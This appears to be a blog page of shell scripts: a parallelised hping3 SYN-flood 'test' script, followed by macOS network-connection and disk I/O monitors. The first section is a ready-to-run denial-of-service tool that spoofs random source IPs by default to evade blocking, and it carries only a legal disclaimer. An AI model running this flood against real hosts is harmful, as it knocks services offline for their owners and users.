A SYN flood test using hping3 that allows you to specify the number of SYN packets to send and scales horizontally with a specific number of processes can be created using a Bash script with the xargs command. This approach allows you to distribute the workload across multiple processes for better performance.

The Script

This script uses hping3 to perform a SYN flood attack with a configurable packet count and number of parallel processes.

cat > ./syn_flood_parallel.sh << 'EOF'
#!/bin/bash
# A simple script to perform a SYN flood test using hping3,
# with configurable packet count, parallel processes, and optional source IP randomization.
# --- Configuration ---
TARGET_IP=$1
TARGET_PORT=$2
PACKET_COUNT_TOTAL=$3
PROCESSES=$4
RANDOMIZE_SOURCE=${5:-true}  # Default to true if not specified
# --- Usage Message ---
if [ -z "$TARGET_IP" ] || [ -z "$TARGET_PORT" ] || [ -z "$PACKET_COUNT_TOTAL" ] || [ -z "$PROCESSES" ]; then
echo "Usage: $0 <TARGET_IP> <TARGET_PORT> <PACKET_COUNT_TOTAL> <PROCESSES> [RANDOMIZE_SOURCE]"
echo ""
echo "Parameters:"
echo "  TARGET_IP           - Target IP address or hostname"
echo "  TARGET_PORT         - Target port number (1-65535)"
echo "  PACKET_COUNT_TOTAL  - Total number of SYN packets to send"
echo "  PROCESSES           - Number of parallel processes (2-10 recommended)"
echo "  RANDOMIZE_SOURCE    - true/false (optional, default: true)"
echo ""
echo "Examples:"
echo "  $0 192.168.1.1 80 100000 4           # With randomized source IPs (default)"
echo "  $0 192.168.1.1 80 100000 4 true      # Explicitly enable source IP randomization"
echo "  $0 192.168.1.1 80 100000 4 false     # Use actual source IP (no randomization)"
exit 1
fi
# --- Main Logic ---
echo "========================================"
echo "Starting SYN flood test on $TARGET_IP:$TARGET_PORT"
echo "Sending $PACKET_COUNT_TOTAL SYN packets with $PROCESSES parallel processes."
echo "Source IP randomization: $RANDOMIZE_SOURCE"
echo "========================================"
# Calculate packets per process
PACKETS_PER_PROCESS=$((PACKET_COUNT_TOTAL / PROCESSES))
# Build hping3 command based on randomization option
if [ "$RANDOMIZE_SOURCE" = "true" ]; then
echo "Using randomized source IPs (--rand-source)"
# Use seq and xargs to parallelize the hping3 command with random source IPs
seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --rand-source --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
else
echo "Using actual source IP (no randomization)"
# Use seq and xargs to parallelize the hping3 command without source randomization
seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
fi
echo ""
echo "========================================"
echo "SYN flood test complete."
echo "Total packets sent: $PACKET_COUNT_TOTAL"
echo "========================================"
EOF
chmod +x ./syn_flood_parallel.sh

Example Usage:

# Default behavior - randomized source IPs (parameter 5 defaults to true)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4
# Explicitly enable source IP randomization
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 true
# Disable source IP randomization (use actual source IP)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 false
# High-volume test with randomized IPs
./syn_flood_parallel.sh example.com 443 100000 8 true
# Test without IP randomization (easier to trace/debug)
./syn_flood_parallel.sh testserver.local 22 5000 2 false

Explanation of the Parameters:

Parameter 1: TARGET_IP

  • The target IP address or hostname
  • Examples: 192.168.1.1, example.com, 10.0.0.5

Parameter 2: TARGET_PORT

  • The target port number (1-65535)
  • Common: 80 (HTTP), 443 (HTTPS), 22 (SSH), 8080

Parameter 3: PACKET_COUNT_TOTAL

  • Total number of SYN packets to send
  • Range: Any positive integer (e.g., 1000 to 1000000)

Parameter 4: PROCESSES

  • Number of parallel hping3 processes to spawn
  • Recommended: 2-10 (depending on CPU cores)

Parameter 5: RANDOMIZE_SOURCE (OPTIONAL)

  • true: Use randomized source IPs (–rand-source flag)
    Makes packets appear from random IPs, harder to block
  • false: Use actual source IP (no randomization)
    Easier to trace and debug, simpler firewall rules
  • Default: true (if parameter not specified)

Important Considerations ⚠️

• Permissions: hping3 requires root or superuser privileges to craft and send raw packets. You’ll need to run this script with sudo.

• Legal and Ethical Use: This tool is for ethical and educational purposes only. Using this script to perform a SYN flood attack on a network or system you do not own or have explicit permission to test is illegal. Use it in a controlled lab environment.

Macbook: Return a list of processes using a specific remote port number

I find this script useful for debugging which processes are talking to which remote port.

cat > ~/netmon.sh << 'EOF'
#!/bin/zsh
# Network Connection Monitor with Color Coding
# Shows TCP/UDP connections with state and process info
# Refreshes every 5 seconds
# Usage: ./netmon.sh [--port PORT] [--ip IP_ADDRESS]
# Parse command line arguments
FILTER_PORT=""
FILTER_IP=""
while [[ $# -gt 0 ]]; do
case $1 in
--port|-p)
FILTER_PORT="$2"
shift 2
;;
--ip|-i)
FILTER_IP="$2"
shift 2
;;
--help|-h)
echo "Usage: $0 [OPTIONS]"
echo "Options:"
echo "  --port, -p PORT    Filter by remote port"
echo "  --ip, -i IP        Filter by remote IP address"
echo "  --help, -h         Show this help message"
echo ""
echo "Examples:"
echo "  $0 --port 443      Show only connections to port 443"
echo "  $0 --ip 1.1.1.1    Show only connections to IP 1.1.1.1"
echo "  $0 -p 80 -i 192.168.1.1  Show connections to 192.168.1.1:80"
exit 0
;;
*)
echo "Unknown option: $1"
echo "Use --help for usage information"
exit 1
;;
esac
done
# Color definitions
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
MAGENTA='\033[0;35m'
CYAN='\033[0;36m'
WHITE='\033[1;37m'
GRAY='\033[0;90m'
NC='\033[0m' # No Color
BOLD='\033[1m'
# Function to get process name from PID
get_process_name() {
local pid=$1
if [ "$pid" != "-" ] && [ "$pid" != "0" ] && [ -n "$pid" ]; then
ps -p "$pid" -o comm= 2>/dev/null || echo "unknown"
else
echo "-"
fi
}
# Function to color-code based on state
get_state_color() {
local state=$1
case "$state" in
"ESTABLISHED")
echo "${GREEN}"
;;
"LISTEN")
echo "${BLUE}"
;;
"TIME_WAIT")
echo "${YELLOW}"
;;
"CLOSE_WAIT")
echo "${MAGENTA}"
;;
"SYN_SENT"|"SYN_RCVD")
echo "${CYAN}"
;;
"FIN_WAIT"*)
echo "${GRAY}"
;;
"CLOSING"|"LAST_ACK")
echo "${RED}"
;;
*)
echo "${WHITE}"
;;
esac
}
# Function to split address into IP and port
split_address() {
local addr=$1
local ip=""
local port=""
if [[ "$addr" == "*"* ]]; then
ip="*"
port="*"
elif [[ "$addr" =~ ^([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\.([0-9]+)$ ]]; then
# IPv4 address with port (format: x.x.x.x.port)
ip="${match[1]}"
port="${match[2]}"
elif [[ "$addr" =~ ^(.*):([0-9]+)$ ]]; then
# Handle IPv6 format or hostname:port
ip="${match[1]}"
port="${match[2]}"
elif [[ "$addr" =~ ^(.*)\.(well-known|[a-z]+)$ ]]; then
# Handle named services
ip="${match[1]}"
port="${match[2]}"
else
ip="$addr"
port="-"
fi
echo "$ip|$port"
}
# Function to check if connection matches filters
matches_filter() {
local remote_ip=$1
local remote_port=$2
# Check port filter
if [ -n "$FILTER_PORT" ] && [ "$remote_port" != "$FILTER_PORT" ]; then
return 1
fi
# Check IP filter
if [ -n "$FILTER_IP" ]; then
# Handle partial IP matching
if [[ "$remote_ip" != *"$FILTER_IP"* ]]; then
return 1
fi
fi
return 0
}
# Function to display connections
show_connections() {
clear
# Header
echo -e "${BOLD}${WHITE}=== Network Connections Monitor ===${NC}"
echo -e "${BOLD}${WHITE}$(date '+%Y-%m-%d %H:%M:%S')${NC}"
# Show active filters
if [ -n "$FILTER_PORT" ] || [ -n "$FILTER_IP" ]; then
echo -e "${YELLOW}Active Filters:${NC}"
[ -n "$FILTER_PORT" ] && echo -e "  Remote Port: ${BOLD}$FILTER_PORT${NC}"
[ -n "$FILTER_IP" ] && echo -e "  Remote IP: ${BOLD}$FILTER_IP${NC}"
fi
echo ""
# Legend
echo -e "${BOLD}Color Legend:${NC}"
echo -e "  ${GREEN}●${NC} ESTABLISHED    ${BLUE}●${NC} LISTEN         ${YELLOW}●${NC} TIME_WAIT"
echo -e "  ${CYAN}●${NC} SYN_SENT/RCVD  ${MAGENTA}●${NC} CLOSE_WAIT     ${RED}●${NC} CLOSING/LAST_ACK"
echo -e "  ${GRAY}●${NC} FIN_WAIT       ${WHITE}●${NC} OTHER/UDP"
echo ""
# Table header
printf "${BOLD}%-6s %-22s %-22s %-7s %-12s %-8s %-30s${NC}\n" \
"PROTO" "LOCAL ADDRESS" "REMOTE IP" "R.PORT" "STATE" "PID" "PROCESS"
echo "$(printf '%.0s-' {1..120})"
# Temporary file for storing connections
TMPFILE=$(mktemp)
# Get TCP connections with netstat
# Note: On macOS, we need sudo to see process info for all connections
if command -v sudo >/dev/null 2>&1; then
# Try with sudo first (will show all processes)
sudo netstat -anp tcp 2>/dev/null | grep -E '^tcp' > "$TMPFILE" 2>/dev/null || \
netstat -an -p tcp 2>/dev/null | grep -E '^tcp' > "$TMPFILE"
else
netstat -an -p tcp 2>/dev/null | grep -E '^tcp' > "$TMPFILE"
fi
# Process TCP connections
while IFS= read -r line; do
# Parse netstat output (macOS format)
proto=$(echo "$line" | awk '{print $1}')
local_addr=$(echo "$line" | awk '{print $4}')
remote_addr=$(echo "$line" | awk '{print $5}')
state=$(echo "$line" | awk '{print $6}')
# Split remote address into IP and port
IFS='|' read -r remote_ip remote_port <<< "$(split_address "$remote_addr")"
# Apply filters
if ! matches_filter "$remote_ip" "$remote_port"; then
continue
fi
# Try to get PID using lsof for the local address
if [[ "$local_addr" =~ ^([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\.([0-9]+)$ ]]; then
port="${match[2]}"
elif [[ "$local_addr" =~ '^\*\.([0-9]+)$' ]]; then
port="${match[1]}"
elif [[ "$local_addr" =~ ^([0-9a-f:]+)\.([0-9]+)$ ]]; then
port="${match[2]}"
# Use lsof to find the PID
pid=$(sudo lsof -i TCP:$port -sTCP:$state 2>/dev/null | grep -v PID | head -1 | awk '{print $2}')
if [ -z "$pid" ]; then
pid="-"
process="-"
else
process=$(get_process_name "$pid")
fi
else
pid="-"
process="-"
fi
# Get color based on state
color=$(get_state_color "$state")
# Format and print
printf "${color}%-6s %-22s %-22s %-7s %-12s %-8s %-30s${NC}\n" \
"$proto" \
"${local_addr:0:22}" \
"${remote_ip:0:22}" \
"${remote_port:0:7}" \
"$state" \
"$pid" \
"${process:0:30}"
done < "$TMPFILE"
# Get UDP connections
echo ""
if command -v sudo >/dev/null 2>&1; then
sudo netstat -anp udp 2>/dev/null | grep -E '^udp' > "$TMPFILE" 2>/dev/null || \
netstat -an -p udp 2>/dev/null | grep -E '^udp' > "$TMPFILE"
else
netstat -an -p udp 2>/dev/null | grep -E '^udp' > "$TMPFILE"
fi
# Process UDP connections
while IFS= read -r line; do
# Parse netstat output for UDP
proto=$(echo "$line" | awk '{print $1}')
local_addr=$(echo "$line" | awk '{print $4}')
remote_addr=$(echo "$line" | awk '{print $5}')
# Split remote address into IP and port
IFS='|' read -r remote_ip remote_port <<< "$(split_address "$remote_addr")"
# Apply filters
if ! matches_filter "$remote_ip" "$remote_port"; then
continue
fi
# UDP doesn't have state
state="*"
# Try to get PID using lsof for the local address
if [[ "$local_addr" =~ ^([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\.([0-9]+)$ ]]; then
port="${match[2]}"
elif [[ "$local_addr" =~ '^\*\.([0-9]+)$' ]]; then
port="${match[1]}"
elif [[ "$local_addr" =~ ^([0-9a-f:]+)\.([0-9]+)$ ]]; then
port="${match[2]}"
# Use lsof to find the PID
pid=$(sudo lsof -i UDP:$port 2>/dev/null | grep -v PID | head -1 | awk '{print $2}')
if [ -z "$pid" ]; then
pid="-"
process="-"
else
process=$(get_process_name "$pid")
fi
else
pid="-"
process="-"
fi
# White color for UDP
printf "${WHITE}%-6s %-22s %-22s %-7s %-12s %-8s %-30s${NC}\n" \
"$proto" \
"${local_addr:0:22}" \
"${remote_ip:0:22}" \
"${remote_port:0:7}" \
"$state" \
"$pid" \
"${process:0:30}"
done < "$TMPFILE"
# Clean up
rm -f "$TMPFILE"
# Footer
echo ""
echo "$(printf '%.0s-' {1..120})"
echo -e "${BOLD}Press Ctrl+C to exit${NC} | Refreshing every 5 seconds..."
# Show filter hint if no filters active
if [ -z "$FILTER_PORT" ] && [ -z "$FILTER_IP" ]; then
echo -e "${GRAY}Tip: Use --port PORT or --ip IP to filter connections${NC}"
fi
}
# Trap Ctrl+C to exit cleanly
trap 'echo -e "\n${BOLD}Exiting...${NC}"; exit 0' INT
# Main loop
echo -e "${BOLD}${CYAN}Starting Network Connection Monitor...${NC}"
echo -e "${YELLOW}Note: Run with sudo for complete process information${NC}"
# Show active filters on startup
if [ -n "$FILTER_PORT" ] || [ -n "$FILTER_IP" ]; then
echo -e "${GREEN}Filtering enabled:${NC}"
[ -n "$FILTER_PORT" ] && echo -e "  Remote Port: ${BOLD}$FILTER_PORT${NC}"
[ -n "$FILTER_IP" ] && echo -e "  Remote IP: ${BOLD}$FILTER_IP${NC}"
fi
sleep 2
while true; do
show_connections
sleep 5
done
EOF
chmod +x ~/netmon.sh

Example Usuage:

# Show all connections
./netmon.sh
# Filter by port
./netmon.sh --port 443
# Filter by IP
./netmon.sh --ip 142.251
# Run with sudo for full process information
sudo ./netmon.sh --port 443

Macbook: Script to monitor the top disk reads and writes

The script below tracks disk usage of a macbook for 20 seconds and the shows the processes with the highest disk utilisations

#!/bin/bash
# Disk I/O Monitor for macOS
# Shows which processes are using disk I/O the most with full paths
DURATION=20
echo "Disk I/O Monitor for macOS"
echo "========================================"
echo ""
# Check for sudo
if [[ $EUID -ne 0 ]]; then
echo "ERROR: This script requires sudo privileges"
echo "Please run: sudo $0"
exit 1
fi
# Create temp file
TEMP_FILE="/tmp/disk_io_$$.txt"
export TEMP_FILE
# Collect data
echo "Collecting disk I/O data for $DURATION seconds..."
fs_usage -w -f filesys 2>/dev/null > "$TEMP_FILE" &
FS_PID=$!
# Progress bar
for i in $(seq 1 $DURATION); do
printf "\rProgress: [%-20s] %d/%d seconds" "$(printf '#%.0s' $(seq 1 $((i*20/DURATION))))" $i $DURATION
sleep 1
done
echo ""
# Stop collection
kill $FS_PID 2>/dev/null
wait $FS_PID 2>/dev/null
echo ""
echo "Processing data..."
# Parse with Python - pass temp file as argument
python3 - "$TEMP_FILE" << 'PYTHON_END'
import re
import os
import sys
from collections import defaultdict
import subprocess
# Get temp file from argument
temp_file = sys.argv[1] if len(sys.argv) > 1 else '/tmp/disk_io_temp.txt'
# Storage for process stats
stats = defaultdict(lambda: {'reads': 0, 'writes': 0, 'process_name': '', 'pid': ''})
# Parse fs_usage output
try:
with open(temp_file, 'r') as f:
for line in f:
# Look for lines with process info (format: processname.pid at end of line)
match = re.search(r'(\S+)\.(\d+)\s*$', line)
if match:
process_name = match.group(1)
pid = match.group(2)
key = f"{process_name}|{pid}"
# Store process info
stats[key]['process_name'] = process_name
stats[key]['pid'] = pid
# Categorize operation
if any(op in line for op in ['RdData', 'read', 'READ', 'getattrlist', 'stat64', 'lstat64', 'open']):
stats[key]['reads'] += 1
elif any(op in line for op in ['WrData', 'write', 'WRITE', 'close', 'fsync']):
stats[key]['writes'] += 1
except Exception as e:
print(f"Error reading file: {e}")
sys.exit(1)
# Calculate totals
total_ops = sum(s['reads'] + s['writes'] for s in stats.values())
# Get executable paths
def get_exe_path(process_name, pid):
try:
# Method 1: Try lsof with format output
result = subprocess.run(['lsof', '-p', pid, '-Fn'], capture_output=True, text=True, stderr=subprocess.DEVNULL)
paths = []
for line in result.stdout.split('\n'):
if line.startswith('n'):
path = line[1:].strip()
paths.append(path)
# Look for the best path
for path in paths:
if '/Contents/MacOS/' in path and process_name in path:
return path
elif path.endswith('.app'):
return path
elif any(p in path for p in ['/bin/', '/sbin/', '/usr/']) and not any(path.endswith(ext) for ext in ['.dylib', '.so']):
return path
# Method 2: Try ps
result = subprocess.run(['ps', '-p', pid, '-o', 'command='], capture_output=True, text=True, stderr=subprocess.DEVNULL)
if result.stdout.strip():
cmd = result.stdout.strip().split()[0]
if os.path.exists(cmd):
return cmd
# Method 3: Return command name from ps
result = subprocess.run(['ps', '-p', pid, '-o', 'comm='], capture_output=True, text=True, stderr=subprocess.DEVNULL)
if result.stdout.strip():
return result.stdout.strip()
except Exception:
pass
# Last resort: return process name
return process_name
# Sort by total operations
sorted_stats = sorted(stats.items(), key=lambda x: x[1]['reads'] + x[1]['writes'], reverse=True)
# Print header
print("\n%-30s %-8s %-45s %8s %8s %8s %7s %7s" % 
("Process Name", "PID", "Executable Path", "Reads", "Writes", "Total", "Read%", "Write%"))
print("=" * 140)
# Print top 20 processes
count = 0
for key, data in sorted_stats:
if data['reads'] + data['writes'] == 0:
continue
total = data['reads'] + data['writes']
read_pct = (data['reads'] * 100.0 / total_ops) if total_ops > 0 else 0
write_pct = (data['writes'] * 100.0 / total_ops) if total_ops > 0 else 0
# Get executable path
exe_path = get_exe_path(data['process_name'], data['pid'])
if len(exe_path) > 45:
exe_path = "..." + exe_path[-42:]
print("%-30s %-8s %-45s %8d %8d %8d %6.1f%% %6.1f%%" % 
(data['process_name'][:30], 
data['pid'], 
exe_path,
data['reads'], 
data['writes'], 
total,
read_pct, 
write_pct))
count += 1
if count >= 20:
break
print("=" * 140)
print(f"Total I/O operations captured: {total_ops}")
PYTHON_END
# Cleanup
rm -f "$TEMP_FILE"
echo ""
echo "Monitoring complete."

Example output:

Disk I/O Monitor for macOS
========================================
Collecting disk I/O data for 20 seconds...
Progress: [####################] 20/20 seconds
Processing data...
Process Name                   PID      Executable Path                                  Reads   Writes    Total   Read%  Write%
============================================================================================================================================
Chrome                         4719678  Chrome                                             427      811     1238    3.1%    5.9%
UPMServiceController           4644625  UPMServiceController                               423      587     1010    3.1%    4.3%
UPMServiceController           4014337  UPMServiceController                               468      309      777    3.4%    2.2%
wsdlpd                         3060029  wsdlpd                                             154      370      524    1.1%    2.7%
tccd                           4743441  tccd                                               359       48      407    2.6%    0.3%
tccd                           4742031  tccd                                               358       48      406    2.6%    0.3%
com.crowdstrike.falcon.Agent   6174     com.crowdstrike.falcon.Agent                       301        5      306    2.2%    0.0%
UPMServiceContro               4644625  UPMServiceContro                                    12      285      297    0.1%    2.1%
mds_stores                     4736869  mds_stores                                         204       71      275    1.5%    0.5%
EndPointClassifier             6901     EndPointClassifier                                  40      231      271    0.3%    1.7%